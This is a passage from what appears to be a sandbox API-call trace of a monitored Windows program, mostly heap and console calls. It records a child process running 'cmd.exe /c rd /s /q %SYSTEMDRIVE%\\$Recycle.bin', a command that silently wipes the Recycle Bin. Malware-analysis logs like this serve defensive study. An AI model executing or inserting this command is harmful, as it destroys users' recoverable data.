lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0082.138] GetConsoleOutputCP () returned 0x1b5 [0082.138] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system cannot find the file specified.\r\n", cchWideChar=44, lpMultiByteStr=0x5ba1e8, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the file specified.\r\n", lpUsedDefaultChar=0x0) returned 44 [0082.139] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 44 [0082.139] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0082.139] TaskScheduler:IUnknown:Release (This=0x3b3ce8) returned 0x0 [0082.139] TaskScheduler:IUnknown:Release (This=0x3b3c80) returned 0x1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5200) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5200) returned 0x16 [0082.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5200 | out: hHeap=0x1b0000) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a50) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4a50) returned 0x10 [0082.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a50 | out: hHeap=0x1b0000) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5220) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5220) returned 0x14 [0082.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5220 | out: hHeap=0x1b0000) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c64f8) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c64f8) returned 0xa0 [0082.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c64f8 | out: hHeap=0x1b0000) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b28) returned 1 [0082.139] GetProcessHeap () returned 0x1b0000 [0082.139] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4b28) returned 0x10 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b28 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5120) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5120) returned 0x14 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5120 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5908) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5908) returned 0x208 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5908 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ac8) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4ac8) returned 0x10 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ac8 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5080) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5080) returned 0x14 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5080 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c65a0) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c65a0) returned 0x200 [0082.140] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c65a0 | out: hHeap=0x1b0000) returned 1 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] GetProcessHeap () returned 0x1b0000 [0082.140] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b40) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4b40) returned 0x10 [0082.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b40 | out: hHeap=0x1b0000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5020) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5020) returned 0x14 [0082.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5020 | out: hHeap=0x1b0000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d5210) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1d5210) returned 0x1000 [0082.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d5210 | out: hHeap=0x1b0000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d1158) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1d1158) returned 0x10 [0082.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d1158 | out: hHeap=0x1b0000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5000) returned 0x14 [0082.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5000 | out: hHeap=0x1b0000) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.141] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51a0) returned 1 [0082.141] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c51a0) returned 0x14 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51a0 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b88) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4b88) returned 0x10 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b88 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fa0) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4fa0) returned 0x14 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fa0 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51e0) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c51e0) returned 0x16 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51e0 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b58) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4b58) returned 0x10 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4b58 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f68) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4f68) returned 0x14 [0082.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f68 | out: hHeap=0x1b0000) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d46a0) returned 1 [0082.142] GetProcessHeap () returned 0x1b0000 [0082.142] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1d46a0) returned 0x5a [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d46a0 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e48) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4e48) returned 0x14 [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e48 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e68) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4e68) returned 0x14 [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e68 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e88) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4e88) returned 0x14 [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4e88 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ea8) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4ea8) returned 0x14 [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ea8 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5140) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5140) returned 0x14 [0082.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5140 | out: hHeap=0x1b0000) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5160) returned 1 [0082.143] GetProcessHeap () returned 0x1b0000 [0082.143] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5160) returned 0x14 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5160 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c67a8) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c67a8) returned 0x30 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c67a8 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5180) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5180) returned 0x14 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5180 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c67e0) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c67e0) returned 0x30 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c67e0 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51c0) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c51c0) returned 0x14 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c51c0 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d10e0) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1d10e0) returned 0xe [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d10e0 | out: hHeap=0x1b0000) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5600) returned 1 [0082.144] GetProcessHeap () returned 0x1b0000 [0082.144] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5600) returned 0x14 [0082.144] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5600 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a80) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4a80) returned 0x10 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a80 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ec8) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4ec8) returned 0x14 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ec8 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ee8) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4ee8) returned 0x14 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ee8 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f08) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4f08) returned 0x14 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f08 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f28) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4f28) returned 0x14 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f28 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a98) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4a98) returned 0x10 [0082.145] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a98 | out: hHeap=0x1b0000) returned 1 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.145] GetProcessHeap () returned 0x1b0000 [0082.146] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f48) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4f48) returned 0x14 [0082.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4f48 | out: hHeap=0x1b0000) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fc0) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4fc0) returned 0x14 [0082.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fc0 | out: hHeap=0x1b0000) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5040) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5040) returned 0x14 [0082.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5040 | out: hHeap=0x1b0000) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5060) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5060) returned 0x14 [0082.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5060 | out: hHeap=0x1b0000) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c50c0) returned 1 [0082.146] GetProcessHeap () returned 0x1b0000 [0082.146] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c50c0) returned 0x14 [0082.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c50c0 | out: hHeap=0x1b0000) returned 1 [0082.147] GetProcessHeap () returned 0x1b0000 [0082.147] GetProcessHeap () returned 0x1b0000 [0082.147] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c50e0) returned 1 [0082.147] GetProcessHeap () returned 0x1b0000 [0082.148] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c50e0) returned 0x14 [0082.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c50e0 | out: hHeap=0x1b0000) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5100) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c5100) returned 0x14 [0082.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c5100 | out: hHeap=0x1b0000) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ab0) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4ab0) returned 0x10 [0082.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4ab0 | out: hHeap=0x1b0000) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fe0) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4fe0) returned 0x14 [0082.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4fe0 | out: hHeap=0x1b0000) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] HeapValidate (hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a68) returned 1 [0082.148] GetProcessHeap () returned 0x1b0000 [0082.148] RtlSizeHeap (HeapHandle=0x1b0000, Flags=0x0, MemoryPointer=0x1c4a68) returned 0x10 [0082.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1c4a68 | out: hHeap=0x1b0000) returned 1 [0082.148] exit (_Code=1) Thread: id = 87 os_tid = 0xad8 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x78648000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"cmd.exe\" /c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0xa34 [0081.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3bfec4 | out: lpSystemTimeAsFileTime=0x3bfec4*(dwLowDateTime=0xbc62370, dwHighDateTime=0x1d6f0d1)) [0081.690] GetCurrentProcessId () returned 0xa24 [0081.690] GetCurrentThreadId () returned 0xa34 [0081.690] GetTickCount () returned 0x114aee6 [0081.690] QueryPerformanceCounter (in: lpPerformanceCount=0x3bfebc | out: lpPerformanceCount=0x3bfebc*=20079087327) returned 1 [0081.692] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9e0000 [0081.692] __set_app_type (_Type=0x1) [0081.692] __p__fmode () returned 0x770331f4 [0081.695] __p__commode () returned 0x770331fc [0081.695] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa021a6) returned 0x0 [0081.695] __getmainargs (in: _Argc=0x4aa04238, _Argv=0x4aa04240, _Env=0x4aa0423c, _DoWildCard=0, _StartInfo=0x4aa04140 | out: _Argc=0x4aa04238, _Argv=0x4aa04240, _Env=0x4aa0423c) returned 0 [0081.695] GetCurrentThreadId () returned 0xa34 [0081.695] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa34) returned 0x60 [0081.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.695] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0081.695] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3bfe54 | out: phkResult=0x3bfe54*=0x0) returned 0x2 [0081.696] VirtualQuery (in: lpAddress=0x3bfe8b, lpBuffer=0x3bfe24, dwLength=0x1c | out: lpBuffer=0x3bfe24*(BaseAddress=0x3bf000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.696] VirtualQuery (in: 